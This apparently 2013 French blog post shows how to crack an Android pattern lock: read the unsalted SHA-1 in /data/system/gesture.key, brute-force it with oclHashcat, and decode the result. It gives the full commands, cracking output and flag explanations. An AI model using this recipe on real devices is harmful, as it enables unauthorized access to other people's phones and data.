Bon c’est connu maintenant, la paterne est dans le fichier /data/system/gesture.key et c’est un vieux Sha1 non salé
https://code.google.com/p/android/issues/detail?id=37218
C’est clairement expliqué là : http://forensics.spreitzenbarth.de/2012/02/28/cracking-the-pattern-lock-on-android/
Le plus dur est d’avoir une liste de Sha1 avec que des numériques en hexa rapidement. Heureusement… il y a Hashcat qui fait ça instantanément..
Voici la syntaxe qui va bien :
Convertir le hash en ascii
$ cat /home/thanatos/Desktop/gesture.key | hexdump -v -e '/1 "%02x"' > ../hash.txt
Hasher menu ce Hash…(4 Secondes).
$ ./oclHashcat-plus64.bin -m 100 -a 3 -o ../result.bin ../hash.txt --hex-charset -1 000102030405060708 ?1?1?1?1?1?1?1?1?1 --force -i oclHashcat-plus v0.14 by atom starting... Hashes: 1 total, 1 unique salts, 1 unique digests Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes Workload: 128 loops, 80 accel Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 80c Device #1: Cypress, 512MB, 725Mhz, 18MCU Device #1: Kernel ./kernels/4098/m0100_a3.Cypress_1124.2_1124.2.kernel (311420 bytes) Session.Name...: oclHashcat-plus Status.........: Cracked Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1) Hash.Target....: 23a6e7c835cd75c3f17ecc4d1cd7d840b7409525 Hash.Type......: SHA1 Time.Started...: 0 secs Speed.GPU.#1...: 1224.5M/s Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.......: 287612928/387420489 (74.24%) Rejected.......: 0/287612928 (0.00%) HWMon.GPU.#1...: 0% Util, 63c Temp, 42% Fan Started: Fri Jul 26 03:45:10 2013 Stopped: Fri Jul 26 03:45:14 2013
on explique…
./oclHashcat-plus64.bin -m 100 -a 3 -o ../result.bin ../hash.txt --hex-charset -1 000102030405060708 ?1?1?1?1?1?1?1?1?1 --force -i
-m 100 = type de hash sha1
-a 3 = le type de recherche c’est bruteforce
-o nom du fichier de sortie
-hex-charset : les characteres qu’il va essayer sont en hexa
-1 jeux de characteres (en hexa donc) 00 01 etc…
?1?1?1… C’est la patterne de password… ?1 veut dire fout un des chars du jeu de caractères.
–force (j’ai un driver…border line… vous n’êtes pas obligé)
-i incrémental.. essaye 00 à 08 puis 0000 à 0808 etc.. tous les lock n’ont pas la même taille.
Lire le résultat.
$ cat ../result.bin | cut -d ":" -f2 | hexdump -v -e '/1 "%02x\n"' | grep -v 0a 02 01
Adi…